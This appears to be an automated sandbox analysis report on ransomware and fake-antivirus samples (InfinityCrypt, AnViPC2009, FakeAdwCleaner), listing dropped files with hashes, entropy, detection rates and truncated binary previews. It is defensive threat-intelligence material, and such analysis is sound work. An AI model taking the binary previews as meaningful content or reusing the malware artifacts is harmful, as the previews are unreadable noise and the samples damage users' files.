                                                                                                                                                            Preview:..\..dWLS........".{...i/O..:{......z.A..A...`pPw.o..R...aF..."4.#mK...p..\..t1.e......lF).....h...N.L.e.M......$....+.6..n.b.h../..8>.?{..>!.............u..@.I=9E..].....D.."$uY<.z..}Z..|."[....4..M..@.....j.@5V.3&..M.-f.Y.....l.....T.....Wn....Z...|.a...'LKw.....B..C.....gt...wQ..i.l.-.C....q.~...cH.*..QB...i&@.n..O.|.F.LJ.).2...y+C.*)v..Q../.......C..\....UJ"...r.....',..h...}R6.i.T..@.Ps.rNSv...,..XM....a.%...f.(6A....!ROD....4?...~.[^F{...bT...#..]...>)...$.>W..........-..a.g.....C....U..{..HF.yoT.-M.h.#F$......p..p.B..%,e....D_.../..^U.r...Q.80......N..n.|...~5u..QNnN=.!..?@#.....G}*...[q.]..V....J...5.x..!x..a.._.t....F..pRw|N>..... ./.t..X...L....!.....!.)....=-1..X...o.s...VR.3........\n'U..2....8.'H.M3.9X..wK......@....g..o.'.}.A.R.C..2..lE...iu^$....R\.g.@k..B..y.P.E..e.."....%..V.+}..:2'6\ ...C.G,.f....n..D....4.5.j#..NTb..t<.Y...HC....,l.YO.!...8j.....4...9..Z...i.d.:v]...0....m=..p.\Z,..}i*..?........{4..7.7...s..-~ .P
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):959840
                                                                                                                                                            Entropy (8bit):7.999817023381296
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:DrlHQORzVAtXT0z87ZWZizpevMZYGxxVL:Drlwn77ZWZiVev32VL
                                                                                                                                                            MD5:D1D382E89BB6690D259BE7420CD28D52
                                                                                                                                                            SHA1:F922323F04C0098D153DA8E26197F06F6C0EE35B
                                                                                                                                                            SHA-256:0C5C646F961F1E6739B1A6536B828A6B1F057570593F893FAB9EC4EBB13EA413
                                                                                                                                                            SHA-512:5144F90C0FDD3812ED44BDC901F4A12020E754FFA218F2EB2EC2EE8ECB721C1A46521BAF4118995B6F159A5EFF6757F46735DA895E97A9E02E7E5B3E991519DE
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..\..dWLS........".{...i/O..:{......z.A..A...`pPw.o..R...aF..."4.#mK...p..\..t1.e......lF).....h...N.L.e.M......$....+....HQ...^N .5.......5&..e..@..........u....b....}..S.h......? Y..bH.Dg...C .TN{~...o..YS.%;.na..z%iX.]..Q.{+.._...<C..gMvA{..8...6b.`.jLXB:.|8.t.z.v...^....X..2.u.&..x.X...Pu./..$H..._b.k......J"...b..[.....C..B.j.....:?.i..Ne..)..-4..G..:...0......T......9.u.79oL..s..;."xC......[.#]T..`....#p6....r.~.T.vQm..L.*..q.av_....g...".I.j#.]....-......7....G....u.[<........E....L...{.Ca.....&.....%..+.Z..=P.Dh..........!.}&..;....c.;..Z...h0.i.".C.....8...6..d...Kr...P..0%. A@%V.........1..-.:...P...,...L..i.._%..A.*..A.(\~H,.`.......5..a.CY...cZb.y.G..!...d.]...S..g....5<.\..%...%......}q.....:..'5p.Y.\..~...AMa...EB...F...G..Q9v.f'..m.A...YP.....Z..G....@.+Uej}..e..........x...;..qPu...?)..O.....q.z...c..."...Q.&..5a...."......E..}..n.u.c."[....N*H.....QX.........e.....y_$.aq.YivT.=..A......!..B...d.8....j...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):645472
                                                                                                                                                            Entropy (8bit):7.999758110058535
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:nsiV4PCNR8rvN0zIlSIzqX3vC+Yyl8ihT/CeCTj3CCWmG0CaDEgsf:vGKNR8rvSzLyqXq+YyVhTKeC33CGCs1I
                                                                                                                                                            MD5:2B6D648CC1BDD8D3F872CA85B6A04576
                                                                                                                                                            SHA1:3B8041290DE45342C07166E45232E2F1B22CD9CF
                                                                                                                                                            SHA-256:8FB822EF8F3897B29B724F8FC5551EF8D0A5B2D910FBD3DD58961BD8FA86BC40
                                                                                                                                                            SHA-512:7B7D02F50473326206CF5F40AF5BB98E4DE5486D66B6112B432E4645E272EED7D9BB602CAD613A1AA71E358515FDB1209B14AC1B9166B6BDD301FE94D1F310A6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..\..dWLS........".{...i/O..:{......z.A..A......`Ug...'...&..z....,:..8f.;..._jd.,.....2.u....:7......6B...!......j.....:r./..C.u.q.l.I..S&l.7.|.i0.<s%....}.._$ gjx7.k[B...\{.!.=.....-.@.....s.-..R.I.q...%.f...G.M..oj...2..|.....*d.#c....T.7....W...G-.!.lq...s..P.].j.E..U......6..}...=.}p.."nO.B_.Q..~6|..f..U.'bD.:.t#./..|.....9...0.a^Q....&X.........V.R...k..kv...y..........fJ.h.@.?.R.\._r...A.L..^.......e.....S....P..OEc...Ibj..v...R\.{.}s.O..'..?+R..PR.?6V...g,.M6...4.s.N.x/.m.T.B........X.........8<..Lf..(.K.".......c....N..Y.(.E..4z.......ZC.o7@{..#.M...l8..8N.H.Ng...y..zr..,....lpz.[....rs. .=W].h...W=Y.Z..4...*.u......J..$..P..GC"Y..`l.')....~.....24"&...8..`$..7;>.s@8..I....m..K...s*.q?.L.4..5s..o=.Z......R_......p.])...Qj....dC..2%xZ.g.....>s.....L.......G-./.T........m......[.........'..y=.Z.g..VZ.8().4.....*%..S...b.d1.....n`...6I.>.i/L$.\b...n...f.tz."F.....K.<..3.Nb=.....f.j.M.U`....A.[.w..>.P,.e......tOd..x...&6
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):610320
                                                                                                                                                            Entropy (8bit):7.999656328557994
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:myPBcQHM5HcYvfXbLw2QGnt17YcVNPgSZkJG/DD6ppt6aS+9acqX:myPe5NLLw2RLPgSGGDGpT6p5X
                                                                                                                                                            MD5:1A3B94F885719A4A597CA0BBF10A2A14
                                                                                                                                                            SHA1:A349D85D5D6BB0AF2A582C000AC26191FC089C6B
                                                                                                                                                            SHA-256:E64EF85EA287E806121EDA4DE1B70C646F6C4AC70B898BF1CD8B5EAF4F7E824D
                                                                                                                                                            SHA-512:8FD8D6F6746E772D414B33306AC1482B1D6CF4294758A62D60D3E9F9790C660044AB4A5CB930C1F22F9D225DE24E2BEB0E1DE39EDF54E786CAD052EA6A5880E0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..\..dWLS........".{...i/O..:{......z.A..A...2G8@.... 0-.._.J.d.;s_.{>.(....EW.....bR9.1.@........Lv..S....(s.gf6Y.m....I...>.LG.W..TQ... .N......A.0..u........@B.|.x.....A.n.3iH...^....TY.]..."1.0...L...,....RH.y..'...j.?..........H.0Y_.b...i.B.]@..h..JM.Cd.l#.....j.V..3]D.V}.V..t.g.q.p.B.(.M$....G.......'.1.._...L...0.G.s..se`....\._.vh..._....],.g....6.RK..4...m..W.6.!..po.L..6R.]...4..:..I...1.x....2%.#V..m..E..%.......r.......i...2..Ds..V#....~.pT.O...t..A3.a....N.'.[qZ02......I........}.Y!.f..O....8...*.........[.J&.....M.?..Ty....h...s.fM.?#..h..y..@..lu..2.(......T+..4n,.3QI.1.........>..jl..I..;.....X.q.R,Q..l..v...J...Aw$M..,..P..'........%..U../&xr_.1.nq...3. !O..NvX.(.....(l..,.f....Yq5.!.$@..=..@M.%.0..b{.".W...#AkK.6.......!.S+.s.\.?G<.=pL..6d..".....'."k.lKxR......XX$F..8^.N..'........w.f..f..M.Y..}..?.(*.B#.s..}8.B.."..|.%..k.{>..Q....O#......o.+....:.....)]&...&.pk?.fM....m.Yr.......Y...C.E.8NF-)#.~....!....../'...W......Akx...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1256096
                                                                                                                                                            Entropy (8bit):7.999843247025525
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:3da5cIj4bZnIPMbDPzSI7Pc1NWxDbSAfc4m4bGui3VkgkZUsDvK7yTcsu0:3da5cIj4bNIPMbDPzSyeY3pi3VrkZtDH
                                                                                                                                                            MD5:B9D837196E39743237013E3F5C6DDD6D
                                                                                                                                                            SHA1:18C9102CAAF5E10BC9EFF1DA24262FADFE8DA5C3
                                                                                                                                                            SHA-256:407ECA01D57A23B2F6B622EE1FEA6F208ECE82F469D8972D411E87F5712896A2
                                                                                                                                                            SHA-512:FEBCDA2086A54AD7BF6AA71A8C0A371ACB563BAB4025EE90CB647A3010481A65DB8B535381175B2DC6A521E6B9110223ADEAC2846636D343FDFCA960070D011B
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..\..dWLS........".{...i/O..:{......z.A..A......`Ug...'...&..z....,:..8f.;..._jd.,.....2.u....:7......6B...!......j....E...}....m9.ix...{...AE...H<...lK..v-..`.s.Ji..=v.......i.G.......t..X..l....8R_...._e.a6...i&.".C0....&.3.V/r,..?8....~.z.I.*,..,...A......H^...g.36\4..2.._.,.).....gw./..#....j...lmT../K.4.Ml...fp.@..+y.n..u.Nf.8......K.#...bN..".p......n..=..2k....%..aWC..?.....p.Y.}JG.G.S.K...y....<[d.....]B.....QJ..EO}@Q."...9i0.*~#.......lw.K...>P+.q.......'P....n...\1.D"....kvF...>%.A*.24.....^)..:..#.$..-.!...G.0.'x...<.._......_U%.?K@y...~ak.n'..7..%......M'..w1m.T.k-.s..*....z_3)...Q....?.@G..1.H.vs..R[p..*..,......{.s.....4wK.....~dO.!%.2V.^&&.u-........n.1.......6...-......";..}-.C.~.?B..9..^c.D..C...kcCE..;n....b..&c.R.I..F.$b..1.i.08..a.i.....}*k....aB_..... .U....g....t.......8~.....K...).C.i.\..H.1....d"........N.0].WM.)...v.......|.\~h.M.l..T...p:.t.O...k.f..."..!V...g..n?.3.h..gz........1...[..jP./.P..0*..8.eK....A..SQ
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9421312
                                                                                                                                                            Entropy (8bit):3.9863948351946825
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:akMZNqXXZh/M7Y13c9FAddv2z6/HsRsUrnlBvaFOUREPaRZMF6knx82R617:k17Y13c9AvWaFOUREPaRZMF6knx8Q617
                                                                                                                                                            MD5:C18A7323332B3292A8E0F1C81DF65698
                                                                                                                                                            SHA1:BCB8F34CBE0137E888D06ACBCB6508417851A087
                                                                                                                                                            SHA-256:9C42ECA99E96A7402716FD865B57EA601FB9A18477FE2AB890BDBCD3052F68F8
                                                                                                                                                            SHA-512:4D48D11F3D0A740B9193E17782C77B01F52DD6E8324755AA81188295A0CAED0718D330453BB02CA8BC942EE5588928E57A0D89D90D6B1C32690338C5EAE8E1AD
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*.w.n...n...n...g...u...I4t.d......|...p...J...p...........l....ob.j...I4b.q...n.......k.F.....p.......p...o...p...o...p...o...Richn...........PE..L......K.................N...p~......=.......`....@..........................`.................................... 9...g......h.........v.................................................(..........@............`......(...@....................text...3M.......N.................. ..`.rdata...@...`...B...R..............@..@.data...H........T..................@....tls.........p......................@....rsrc.....v.......v.................@..@........................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):69120
                                                                                                                                                            Entropy (8bit):6.190450623836321
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:S9FWW0igMY08p/41AdhEfWoh8eGf9NvvvvvvvvvvvvvvvvJQfBq:S9FxMJj3EWne290
                                                                                                                                                            MD5:4143D4973E0F5A5180E114BDD868D4D2
                                                                                                                                                            SHA1:B47FD2CF9DB0F37C04E4425085FB953CBCE81478
                                                                                                                                                            SHA-256:DA25DB24809479051D980BE5E186926DD53233A76DFE357A455387646BEFCA76
                                                                                                                                                            SHA-512:E21827712A4870461921E7996506FFE456DD2303B69DE370AA0499DDE2E4747A73D8C0E8BD7D91C5BBC414ED5EE06F36D172237489494B3DD311CCD95BA07EBC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......G...........#...8............`.............Dh.........................p................ .............................. .......0... ...................`.......................................................................................text...............................`..`.data...............................@....rdata..@...........................@..@.bss.....................................edata..............................@..@.idata....... ......................@....rsrc.... ...0..."..................@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):35328
                                                                                                                                                            Entropy (8bit):6.036157311970975
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:IZw9E10THMXYyumdlZ3+aJdKE/z85TISX+RfnW:IC9E1yHMXNfdX3+TWz8WRu
                                                                                                                                                            MD5:00A71B4AFDA8033235432B1C433FECC7
                                                                                                                                                            SHA1:D7B0C218AA8FEC1C60ADA26A09D9E0D9601985CA
                                                                                                                                                            SHA-256:F9C9D2B92EFB80F6D11DF52735B8BDDD099847CC79BA56650793B21A0923B1CD
                                                                                                                                                            SHA-512:96635E66D9781AD4D2414271F6A0904CF880ED94FC19186EF4DA5F88F24E14EF1591FDC90E27DB15A6021847C592688D0034F20E2E50CA93BF8C6DB27E8C510A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.G...........#...8.\..........`........p.....o................................J......... .................................d.......x............................................................................................................text...TZ.......\..................`..`.data........p.......`..............@....rdata...............b..............@..@.bss.....................................edata...............h..............@..@.idata..d............l..............@....rsrc...x............r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):86070
                                                                                                                                                            Entropy (8bit):4.886057158141297
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:bspjN7masPcbmZOzyKGdsmkHtpwpSH3UMp4K0/06gZiH3YbcZ8ysAa23Zm:eOEEMzHtpc2l0/0JZiH3YbcZ8lh
                                                                                                                                                            MD5:0AB7D0E87F3843F8104B3670F5A9AF62
                                                                                                                                                            SHA1:10C09A12E318F0FBEBF70C4C42AD6EE31D9DF2E5
                                                                                                                                                            SHA-256:8AECAB563B3C629E8F9DCD525DC2D6B1903F6C600637E63B1EFE05E3C64D757B
                                                                                                                                                            SHA-512:E08E17167EDF461C0FCA1E8B649C0C395793E80F5400F5CBB7D7906D0C99E955FCF6BE2300DB8663D413C4B3FFB075112A6CE5BF259553C0FD3D76200EE0D375
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%.].K.].K.].K.?.X.Y.K..E._.K.].J.h.K...A.X.K..M.\.K...O.Y.K.Rich].K.................PE..L..../.E...........!.........`...............................................P......................................0........ ..P....0..P....................@.......................................................!..|............................text...z........................... ..`.rdata........... ..................@..@.data...$...........................@....idata....... ....... ..............@....rsrc...P....0.......0..............@..@.reloc..v....@.......@..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):384
                                                                                                                                                            Entropy (8bit):7.461915667390366
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:7wCMSmLsDdTcLKHnxnXhYZt+badzVQFQQCGA2hgNV5ZgMqkLhrbRwSxhTArCJNEl:bk4KLKHbGpVQFQtGA25Z6hFMrEEl
                                                                                                                                                            MD5:BDD76E3B30782F47500B045DB6511E42
                                                                                                                                                            SHA1:1CDBB627E632D3555C57EDD7B9E1C3A305716F7C
                                                                                                                                                            SHA-256:1AACE939BCAB0E8A97229BB40845FA13DE1B8EF2EE1B3E54753EE1B263568B3D
                                                                                                                                                            SHA-512:CFC6CD59122B981258F4423A4F7D213AB1CD6222CC8485BDFBE383E8BDAD0C629387902F248DF6EC90D6A59E859BC611083BEDB020D3C8F34AAC8C3951300BE0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....g^.&^.....3:'0....f F...|,Y.$[....W....t..<.a.AL.9A.......{...B.G...b5.../i...`r{.4E...n.Lm...U.....7...s...._......J..v.R}.`.K|.nc....0.Fgq.H#.z".....[`......Y..9q..\X.....J.n....a.@...!...(z..'Y&..p...c|x4j....i...Z.x..p..t.....qJ0...C[.o...A3.%.[_.myY...J......M..^k9 ."lA.Z.m....Z.........?..^%.>...<@z~..R.eW.l1&....z...o...Rj.....g......X.L?..C.E.X...U.V
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):192
                                                                                                                                                            Entropy (8bit):6.872493815723923
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:RM97xpUMY4U3UI0G0tZU4+74pTmK+bC4YegTdUMyX+OiKeYzjDdqlkJ4AMa3dpV0:Op9bIxz7SSCUWdi8F0Vqlk2qdf0
                                                                                                                                                            MD5:DC1D6BA8BB2C37DD9269ED906DCE5970
                                                                                                                                                            SHA1:859BF440CA441FE718BBC7534D19C123C69C42F5
                                                                                                                                                            SHA-256:FEEAA5EDE004CA3F31388697C0A0B7F42130B358D97FD1F7C0DFD4FDF5332897
                                                                                                                                                            SHA-512:C03E23064FF648473C2D1C58B608690C6741128503A5325A2F6B70691FF0AA53E86318F248FB8F099ED460FF99552864C9CEBA826D54BBD687CF297B4084EA5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..))...VX....T3......f=...-..$8....-.i.`.....JAT...|....\].}.M....6/.................y..... ..4=In.;..C(..U....D?..2..8.s.....t.$.....-z{....i%8.[.S..A.f...`...l.%.2 ...8.{_...`.7.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):192
                                                                                                                                                            Entropy (8bit):6.8933271490572565
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:RM97xpUMY4U3UI0G0tZU4+74pTmK+bC4YeEZmDFABUtZrIWCJNYBcSbma7:Op9bIxz7SSCUomDFAqZUjJN1Sbms
                                                                                                                                                            MD5:3B0DD06E2ECB12421FA27EB0592DB496
                                                                                                                                                            SHA1:1DDC3321508BBD72830C2D90BA97D947FB57043B
                                                                                                                                                            SHA-256:50C18808B0054C6BE3C636E9A9A4013A4B3D596990ABB4DB32DC940EDCF51492
                                                                                                                                                            SHA-512:F4A54F3B8561C7DE0BEF7D218DD72A5564ECD8A60D9B56F86692898AB92B3D6B23DFD5ECE3A1C19E302FBA92071C39F043FE55EC94340E87B0603BF507532303
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..))...VX....T3......f=...-..$8....-.i.`.....JAT...|....\].}.M....6/.................y..... ..4=In.;..g!&.P+:|.....2b.X.!...(..5...&:..H....7.....CP..(%`.......L......&....3.:!
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):176
                                                                                                                                                            Entropy (8bit):6.976365993588136
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vC7Y3Vw3yhggaHt20F14AGrdIIrSOcdHMP7saTv5VuVLGJVTHUkxm:7wCMSmLsDdTcLKHW
                                                                                                                                                            MD5:197607D7A6EBCA76120E06E6EA9CE3D1
                                                                                                                                                            SHA1:C27BA0BF2D608554364EE535A729C7348ADD8016
                                                                                                                                                            SHA-256:7616342DE7F607ECFC43AEA9B2A37489DCAE54DBB8E24901E44EE50576896CD7
                                                                                                                                                            SHA-512:B16276A401732BEF17CB31E1C3BB844B675F33E316F18FEE57DBED4EB0BBB28F25F5B29416C09708ADB4755778D1D90AD14644F64BAC409131DFA6E0F7A988B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....g^.&^.....3:'0....f F...|,Y.$[....W....t..<.a.AL.9A.......{...B.G...b5.../i...`r{.4E...n.Lm...U.....7...s...._......J..v.R}.`.K|.nc....0.Fgq.H#.z"...+.E....2a..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):352
                                                                                                                                                            Entropy (8bit):7.427866225138386
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:7wCMSmLsDdTcLKHv5B+0+V/DPj++33pbR92ML7OC4YLRo0xLTKAqrr:bk4KLKHf+5/DPj33ZdwMLaXeq3
                                                                                                                                                            MD5:CD4B7221C1C648DE254A3986E2E50446
                                                                                                                                                            SHA1:8BA839636BA58CFBE95434DFEB9234DE3904C558
                                                                                                                                                            SHA-256:C607E3F18FA3687CBD73169EFA478DED55DCD476C711A8DF640B807EE1D8F781
                                                                                                                                                            SHA-512:921D1F27B37A4FE879C8A9F9AB30ACD87528AA8A47760C966F9B81A2D0C66D3A2C97AD7682BAF6F2383ECD050BF95315757A234428A032BB3F606612E7B178EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....g^.&^.....3:'0....f F...|,Y.$[....W....t..<.a.AL.9A.......{...B.G...b5.../i...`r{.4E...n.Lm...U.....7...s...._......J..v.R}.`.K|.nc....0.Fgq.H#.z"..?.&.._2.'..L.D...W..F..[n.5.....qVB*....x....j........L'.=J9..J....[|w$....h....w....K..D...>...09..L.........v....]>..n.T..&.f$.l.(.U...y..p.6..&.?.as}..1b.8.c..:)..Qf..j]..p.a.[.
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2494
                                                                                                                                                            Entropy (8bit):5.211915066151425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2dS48pX4y/DvKWDkQpye7X8ICDKbs37Ti8TBM8PT52Yb3PPHpXUEqXpbfKFQRFNX:cAn/TLt0J/pXA1JVp/BJFSkC9+TGDNs
                                                                                                                                                            MD5:2AFB4DBE81EFE5B0F70316AA27A85BC4
                                                                                                                                                            SHA1:ECF1FA6A0F08FCD1214E4DCF43741BCC975B87EF
                                                                                                                                                            SHA-256:4DC86054AD11F938D2ADC73863578971355ACAFCEDB82A54AB7FB9D204FEAEA5
                                                                                                                                                            SHA-512:AF85587BB051695940A3B6FC47A4A9103DEA57A46A05A1046F7D2824B26BB774AD054209B04B55C34F46945C58C32E3864520770FC4ED09FE63AA71AE1C6965D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399998126404364</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399998126560620</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399998126404364</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051636774803094</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):172648
                                                                                                                                                            Entropy (8bit):7.623689262295841
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:sqp6y91BH91Be/MbNBQ3MypF06N25xOT5Ng2WV4:Oy/BH/Be00Mypk5sYp4
                                                                                                                                                            MD5:87E4959FEFEC297EBBF42DE79B5C88F6
                                                                                                                                                            SHA1:EBA50D6B266B527025CD624003799BDDA9A6BC86
                                                                                                                                                            SHA-256:4F0033E811FE2497B38F0D45DF958829D01933EBE7D331079EEFC8E38FBEAA61
                                                                                                                                                            SHA-512:232FEDEC0180E85560A226870A244A22F54CA130ED6D6DC95DC02A1FF85F17DA396925C9FF27D522067A30EE3E74A38ADFF375D8752161EE629DF14F39CF6BA9
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 60%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 52%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@z.T.................|............... ........@.. ..............................p.....@.....................................W.......P...............h...........l................................................ ............... ..H............text....z... ...|.................. ..`.rsrc...P............~..............@..@.reloc..............................@..B........................H.......hO...I......,....L..............................................6.(.....(....*...0............(.....r...p.r...p....(....-5~....r...p.o......r...pr...p(....o....r...p(....o.....r&..p(....(...., r:..pr...p(....&r...p(....&(....*.*.*.*.0..........s......o.....( ...*z.,..{....,..{....o!.....("...*...0..^............(#...s$.....s%...}.....s&...}.....s'...}.....s(...}.....s(...}.....s(...}.....s(...}.....s(...}.....s(...}.....{....o)....(*....{.....r...po+...t7...o,....{...
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:CSV text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):847
                                                                                                                                                            Entropy (8bit):5.350326386662965
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKEYHKGD8AoPtHTG1hAHKKPz
                                                                                                                                                            MD5:8695FFB03DE68402BA23CADD1D71EF14
                                                                                                                                                            SHA1:67BBF40D11F0B1841FEE4F622E07855787065E0B
                                                                                                                                                            SHA-256:1F0942A2EECF4990E027C7D609E319ADCF4563F984DD0D8EF2B370A1817F3C1C
                                                                                                                                                            SHA-512:6EDEEAB5EF14473DF54251D69A3E2B7AC29778AEF929F8EC05F03008BF9AD629FE315115B22EDC09E92E1D7F2869CF9D4DDC6DB92C4158E92F80DEDA5A365098
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
